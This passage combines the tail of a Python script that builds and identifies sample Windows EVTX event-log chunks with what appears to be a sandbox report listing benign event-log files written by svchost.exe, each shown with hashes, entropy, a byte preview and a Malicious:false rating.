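    return RECORD_SIG + struct.pack("<IQQ", size, rec_id, ft) + payload + struct.pack("<I", size)


def build_chunk(records: list, first_id: int) -> bytes:
    data = b"".join(records)
    last_id, last_off = first_id + len(records) - 1, 512 + len(data) - len(records[-1])
    hdr = (CHUNK_SIG + struct.pack("<QQQQIIII", first_id, last_id, first_id, last_id, 128,
                                   last_off, 512 + len(data), zlib.crc32(data) & 0xFFFFFFFF)).ljust(120, b"\x00")
    tables = b"\x00" * 384                       # string/template offset tables, unused here
    crc = zlib.crc32(hdr + tables) & 0xFFFFFFFF  # header CRC skips its own 8 bytes at 120..127
    return (hdr + b"\x00" * 4 + struct.pack("<I", crc) + tables + data).ljust(CHUNK_SIZE, b"\x00")


def sample_chunk() -> bytes:
    t0 = datetime(2024, 10, 12, 9, 30, tzinfo=timezone.utc)
    return build_chunk([build_record(i, t0 + timedelta(seconds=i), b"\x0f\x01\x01\x00") for i in (1, 2, 3)], 1)


def sample_file() -> bytes:
    return build_file_header().ljust(4096, b"\x00") + sample_chunk()


if __name__ == "__main__":
    for blob in (build_file_header(), sample_chunk(), sample_file()[:69448]):
        print(identify(blob))
```

Two practical points the parser is built around. First, the 69448-byte ElfFile drop above is smaller than the 4 KiB header block plus one full 64 KiB chunk, so a sandbox copy of a live log ends in a short chunk and the record walk has to stop at the free-space offset rather than assume 65536 bytes. Second, DIRTY only means the header had not been rewritten by a clean close, which is the normal state of a log that the Event Log service (hosted in svchost.exe, the dropping process listed for every entry here) still has open; on its own it is not evidence that the sample touched the logs, which is consistent with the report marking these drops Malicious:false.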
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.014860518194814
                                                      Encrypted:false
                                                      SSDEEP:1536:xbBN2A4VD7VAx8whAGU2woJQghcI5oIRA4Hw:
                                                      MD5:4FB8E2CF8B3F20534836684947962DC2
                                                      SHA1:B263607E627C81DA77DB65DF5AED2F3FD84B83E2
                                                      SHA-256:DEAB680C467984C31D118AC595F0F57E573CEEC460CC4B43FCEB0BD66F731294
                                                      SHA-512:D982DB741A044E222D567712FB4799FF6524A1D451C3D2EE3DF7EB17031AD20EF4EC7098BCFB3E2B00C929EB6569C858EFCF275B28240425E4BF8D994AED9053
                                                      Malicious:false
                                                      Preview:ElfChnk.........V...............V...................0q....................................................................... I............................................=...................................................................................%.......................................X...............?...............................................M...F...................................................................................................................................z...............**..............................g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.15655690871689
                                                      Encrypted:false
                                                      SSDEEP:768:SPB9TXYa1RFxRaayVadMRFyfqd9xZRta7Ea+5BVZUeaBhN1dJhlBlBJ9tFk6dd3s:eXY5nVYIyyqED5BVZUeouPZ
                                                      MD5:2DE60575CB719BF51FAB8A63F696B052
                                                      SHA1:BD44E6B92412898F185D5565865FEA3778573578
                                                      SHA-256:7C14D6D72CD2DE834A0C4D17A68B2584B83B81C647D2C439E1071600E29A803D
                                                      SHA-512:0471E7824795996992E736F33FEA7AF70EA909804DE3AC59EE76B5D0403901A5147558256C3AAE87BA8F1747D151DE63134661BEB9F6E0FF25AB0E3E89BC6B4A
                                                      Malicious:false
                                                      Preview:ElfChnk.........o...............o..........................................................................................._..................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................y.......................**................9..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:modified
                                                      Size (bytes):101120
                                                      Entropy (8bit):2.677115835550678
                                                      Encrypted:false
                                                      SSDEEP:384:qosKxoJkoaAXHoj+yHoe6oaywoBoayiozoayPoGoay9hdo69CcoTorNorWorbvov:810qDCYy10bDCYy10l
                                                      MD5:D66CB039C050ED066E47AB1771F661EF
                                                      SHA1:4C3898F46A5E0686C4575B20CD4AC6E50ED8561B
                                                      SHA-256:F879FDF384530F3B2549A0291CD5EDBC9C8D0A493A0E3B4BFAF6516E46781765
                                                      SHA-512:AD5FA223180C5BA5BC21F1515F3DDD186D53A8BD817F5672CCB1D1E1BFF32C6846705DFA3E74BEAA22B8C84660D5F7E4BDD4DF32368D28FEAC43CA762D11B53A
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................8J..pL....S....................................................................R..@................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................3..................................=/...........$..U)..............................**................f...............$..............................................................>.......V...X.!..e................f......&O......'O.................................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y..k.N.<.D..97d>7.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y./.O.p.e.r.a.t.i.o.n.a.l...!>.U)......!>....[.U.....i...........|...:....A..3...b...%....=.......F.i.l.e.N.a.m.e.L.e.n.g.t.h.......A..3...b...%....=.......F.i.l.e.N
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.8524226245257144
                                                      Encrypted:false
                                                      SSDEEP:384:JhAiPA5PNPxPEPHPhPEPmPSPRP3PoPpPTP8PXPr5P:J2Nr
                                                      MD5:B8E105CC52B7107E2757421373CBA144
                                                      SHA1:39B61BEA2065C4FBEC143881220B37F3BA50A372
                                                      SHA-256:B7EE076088005866A01738ECD3421A4DA3A389FFB9EEB663687823E6647F7B4B
                                                      SHA-512:7670455904F14DA7A9EEFBAD5616D6D00EA262C979EDABB433182500B6EF918C6E534C94DF30D829016C8539DF12CAD5F53EC884C45AA71ACA35CF9B797361BC
                                                      Malicious:false
                                                      Preview:ElfChnk......................................#...&...l2.......................................................................................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................#..........'.......................**..x.............|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.8432997252442703
                                                      Encrypted:false
                                                      SSDEEP:384:4hZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+l9:4WXSYieD+tvgzmMvRpBWfb
                                                      MD5:39EE3557626C7F112A88A4DE12E904C1
                                                      SHA1:C307FECC944D746A49EEA6451B7DA7301F03504C
                                                      SHA-256:2B47146267E6F31192C54D3EDA77EC9ABE6A88B1C72BA9FE789C8073FD632A5A
                                                      SHA-512:304C866E246B3F63BF126B33AED784913A078D44913FD987D896D2D960578B61BA7E24BA3CB8FC76608AB1E5702D0FE587A5FB8C38CDF8913D60F88B1435A2D9
                                                      Malicious:false
                                                      Preview:ElfChnk......................................"...&.....k.....................................................................n..................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................."..................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.9223892466691472
                                                      Encrypted:false
                                                      SSDEEP:384:whqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28t:wbCyhLfIXBS5
                                                      MD5:93BC7C28E3A7B0EC7634432FFB5F26AE
                                                      SHA1:388548D6291DA80F672153D1C18E32BDA335AA90
                                                      SHA-256:D354F4EA745283540D197B6D4C57EFC4F539F7566CFB3A06AEBD1243CD222EE1
                                                      SHA-512:3235FEA5A58C72DCD680D436AA2652F5221C6AC6F5A53882C7817A8A65E63C13087CD5660839FC7CFA0F62C666014608B91ABB4235EF5F79F68EF5806252F84A
                                                      Malicious:false
                                                      Preview:ElfChnk.........F...............F...............P............................................................................*................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n...................................................6...................................**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.838106263184782
                                                      Encrypted:false
                                                      SSDEEP:768:ccMhFBuyKskZljdoKXjtT/r18rQXn8r3e5POH:JMhFBuVge
                                                      MD5:A2D41740C1BAF781019F282E37288DDF
                                                      SHA1:A6FE635B3EC8A6923EDE10C23FC79DD32EF4F621
                                                      SHA-256:7008D3010B17C0B09643D10D26B19FB971BB1963C414C1466BEAD617CF9F15E7
                                                      SHA-512:E33A0A2F9473D2D05E9704FE16E6EE34FB51FD8E25A3D60E1F7A67665CA14421B6511D896526AFC7CAE1BF629BB7013FA10663620C5450F1BB51A465EF5A51CB
                                                      Malicious:false
                                                      Preview:ElfChnk.........?...............?...................<.md.....................................................................?.Q................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A......&...................................**..x...........,.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.634418630947688
                                                      Encrypted:false
                                                      SSDEEP:768:/VQ+uYvAzBCBao/F6Cf2SEqEhwaK41HZaUeI36ISKEeKRe:cH
                                                      MD5:A00BAFFCABB00428EA0512FCECCC55E5
                                                      SHA1:19F7C942DC26C3FF56D6240158734AFF67D6B93E
                                                      SHA-256:92264C9E28AB541669DED47CFAF1E818EBD863FA9E8FC6B0F52175D694A9E0D9
                                                      SHA-512:DF94AA8FA0610A0EFE7BAC0DB2A01645A4CD1C7FAD62E914EF914B526B651ED62600F63909D26149FD17C259348DADE05F48759B1DF092970251DB86690CC2B6
                                                      Malicious:false
                                                      Preview:ElfChnk.........m...............m.....................]......................................................................p.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................................%0......**..@...........WW. ..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.0646587531847893
                                                      Encrypted:false
                                                      SSDEEP:384:eh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDK:eMAP1Qa5AgfQQgniwS
                                                      MD5:399CAF70AC6E1E0C918905B719A0B3DD
                                                      SHA1:62360CD0CA66E23C70E6DE3340698E7C0D789972
                                                      SHA-256:FD081487CCB0ACEAD6F633AADBA4B977D2C9360CE8EAC36EAB4E3C84A701D849
                                                      SHA-512:A3E17DA61D4F7C0C94FD0B67707AE35250656842D602906DE515B5E46ECD5078AC68AE607B99DC1A6061B0F896759FE46FF8EE350774205635D30363D46939EA
                                                      Malicious:false
                                                      Preview:ElfChnk......................................g...j..%s.g........................................................................................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................................&...........c..;...............................**..x...........HD................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.4364303862010575
                                                      Encrypted:false
                                                      SSDEEP:384:PhrE2E+EAsbE3VgEWsUiEcEf4eEOhEmELVFEEE5ejElEreEFEzEAEWE+EWEeEKEy:P3sleByhfIwPGa1SEzy
                                                      MD5:2BB73ACC8F7419459C4BF931AB85352C
                                                      SHA1:F1CE2EB960D3886F76094E2327DD092FC1208C7E
                                                      SHA-256:1969400F6FC72AD4A41092FEC53A19078C98DE9FCB2507A3BD8E1930B2447B62
                                                      SHA-512:7D882184DA11B490E111502C8193B73248259D43CC5DCE021CD7264212F1BCD3D62F2A3A2F86929663E2E904961D4F1E406E314020FE904D41694A09C1EB0457
                                                      Malicious:false
                                                      Preview:ElfChnk.p...............p..................../...1..V......................................................................H...................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................m................*..............%................ ..................&............0......................**......p..........T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):3.0631557320109892
                                                      Encrypted:false
                                                      SSDEEP:384:xhYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3KlZ:x1T4hGvj
                                                      MD5:86AEA3A9CA3E5909FD44812754E52BD6
                                                      SHA1:F79B583F83F118AC724A5A4206FC439B88BB8C65
                                                      SHA-256:2AB21F158F9FFA0A375B2ABBD58880A732FABBC436246D40A68DD88D324428C9
                                                      SHA-512:17796DAA6BCE3C6B7EBACD2A683D085AB08C7701DB5FF91DC2D6531E9CC23FCFC52650A6CD02D8B54D4E8C8D5B59DB1688E18571587E0431E4AA914086BE26F5
                                                      Malicious:false
                                                      Preview:ElfChnk.........b...............b...............0...o5@r.....................................................................2..................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.4467272005363894
                                                      Encrypted:false
                                                      SSDEEP:384:EEhFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjD6:JzSKEqsMuy6TN
                                                      MD5:155681C222D825199B738E8DEC707DC8
                                                      SHA1:704C800E7313F77A218203554E1428DF2819BC34
                                                      SHA-256:1505E543085CB6AA30119F10DF11AC8CE061DB0CAC6D44A640E711F96750C4BF
                                                      SHA-512:ADDDE8E26D330EAA13F993D17FF4A6DE7F4120E5B36205EB69FC999B0462B21FD189317EFD1002618551EE24E5C753A09EB34955E8CF1A8E2A22D27516BAB720
                                                      Malicious:false
                                                      Preview:ElfChnk.........L...............L...........x.......ZZO.........................................................................................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=............................................y..................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.156155224835584
                                                      Encrypted:false
                                                      SSDEEP:384:MhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zE:Mmw9g3LU
                                                      MD5:F22AC858C2ACC96E8F189E43FFE46FBD
                                                      SHA1:540B8276921D37FCFFDA3FC7BCFAE1D99A85433B
                                                      SHA-256:771A6E4098CB30081338F06DD7C0B54248C133F9B7B6849FDADDBD6E6FD5BCE9
                                                      SHA-512:B4CF3C51B9FB236207B19FE697CEF6E402C6C903E7570B3938F529E5438F96E230463B9A9B17784A98E580E2B18AA9626E96AA83F705D506AF9C2A0432F0F7D5
                                                      Malicious:false
                                                      Preview:ElfChnk.........6...............6........... o...p..k.?........................................................................x................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#...........................................~i..................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.9197999988543422
                                                      Encrypted:false
                                                      SSDEEP:384:ehqID7I26vIxIPIttIo0IPrI5IMILIjI7I1IIIfrIBBLIgITI:ecx
                                                      MD5:6C3F290FC62CFA9C240AEE8DB1DBA277
                                                      SHA1:CFACCF81F3AA31E8DE85CEAFDAA55AA90FA18BEC
                                                      SHA-256:7841FBB35636229AFB0389965D3DDBD0B7DF4858F1DA8A8FF434830DB8B133D6
                                                      SHA-512:D2C60875EFADB1F3421CDC095B00E32419C0266CB4F58B17AF09A82AAA20EB488C757BA07E7562A033B84A37B3E035C405200BFB29330F79CA565FF21F5EDA88
                                                      Malicious:false
                                                      Preview:ElfChnk.K.......L.......K.......L...........x...86.....U......................................................................+.................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..x...K.........tQ..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 143, DIRTY
                                                      Category:dropped
                                                      Size (bytes):76040
                                                      Entropy (8bit):4.551396690032708
                                                      Encrypted:false
                                                      SSDEEP:768:9LjpPv++M48PFVbUa+5imKLjpPv++M48PFVbUa+5imyY20sMY3Dp13/n/ydIxm6c:LU
                                                      MD5:DD8F2B18604164909CECC144BBE4BD7F
                                                      SHA1:17D2C3BD695F4BBBEFBC4A2B27C053F345226CB1
                                                      SHA-256:1BFE963E4435F2ECA8114899514A58C40CF35D053BE299A06DE2CC49433B4959
                                                      SHA-512:2D1662B855CA588E61220072F36C9EE6E71F40268EE9AB0EED6980CCDE90F34EC66250B63427E9D8662A37E958055C4FDBBD92059CCA458018C5A0AFB5875DBF
                                                      Malicious:false
                                                      Preview:ElfFile.....................................................................................................................I..ElfChnk......................................$...(...n|V.....................................................................p$.................H.......................p...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......!............................................$..................................**..X.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):5.718426658668259
                                                      Encrypted:false
                                                      SSDEEP:384:Thka5Ka5WsR9o2KbzyzIz7a5NsR9o2KbzyzIzia5zzuzNz0zxzuewKWMK/2a55wt:Tdqlt94xODljQdM
                                                      MD5:8630011707C7BFBCECC0A9430637802E
                                                      SHA1:22247A5B6A4C01883BB14E0BD4575A3553F945CB
                                                      SHA-256:227057F9899098B21709D53114E9DECFFCD28207BFFA178AD6B1E32F9C63EDDF
                                                      SHA-512:972629871B28EA6D01B8762B28378F8348E592BD465FE7FD1CF6AB5BD62157230AD3BB729F6290F6EDA950AB20598110676D902756E40BA3067ED37831855076
                                                      Malicious:false
                                                      Preview:ElfChnk.%......./.......%......./...........(l...n.........................................................................b\.;................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&........................6..........**..P...%.......'wu~..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.9963080376858662
                                                      Encrypted:false
                                                      SSDEEP:384:l7h1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMLaMA0MJvMZy:l7eJw
                                                      MD5:A51AFE78FA4481FA05EDC1133C92B1D8
                                                      SHA1:5BA44E7A99EE615E323696742DA6B930E9FF6198
                                                      SHA-256:44C1977D16383DF6B1FFF8164F319DFD99092A124ABA7C7280D74A6BB8AD2094
                                                      SHA-512:792E5E8F5540DCA4B7F003C1043DCBC3E0EC3F23EC4A7B0FA84357F6ABDFD84122C124DBEA2B61D3B5CEED79A3E158DBE95DFCDB20EEAC433D9CDC29C3328F22
                                                      Malicious:false
                                                      Preview:ElfChnk......................................)..0-....\.....................................................................|..........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................)..................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.076996627399968
                                                      Encrypted:false
                                                      SSDEEP:384:Ihk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS12:IBjdjP0cs6N
                                                      MD5:A8ADBDC2B39B55444B2C844F7D81EBDE
                                                      SHA1:F97F40E314C8A2A39953A28CB72C9270D3073418
                                                      SHA-256:93CF0EF4C121FCBB18A8A6DA5912415AF1113816BE6A8F9B86BE6A2243408E09
                                                      SHA-512:922D165CBE871A393D58DAABABE7D09557E242BF73C2C473C29CCB0FB3277B8119911EFF51B12238D23B613AD9C15DAB163C9757BC9006D768B2345F53436E7B
                                                      Malicious:false
                                                      Preview:ElfChnk.........................................X...Y}.......................................................................(.[................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................**..............*5.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):3.227362522701697
                                                      Encrypted:false
                                                      SSDEEP:384:GhhDIEQAGxIHIFIWInIfEITQIAIQIfID8IaxIcI8IfRITGIHUI6IwI2IVIWIfRGq:GhZxGp9I1M
                                                      MD5:AC029715F2D314666C7D30FF3AB6CCBF
                                                      SHA1:B71AAD56B7FDBB8EC118A7FB3DD0FE88FC7DDC77
                                                      SHA-256:905A3299B1C8F91D518A6A815916796C96C5CB2F28085303310EAB99E5EDF123
                                                      SHA-512:209BEBDF4EAEBB34474AA4C2F51B97363D2F2A14824FAB6ADB22C53C0BE32738CAB1300FBB5C482BFF6001BDDE81E414E0CACED23A6BC4CEDFFEFF8F99B61FBD
                                                      Malicious:false
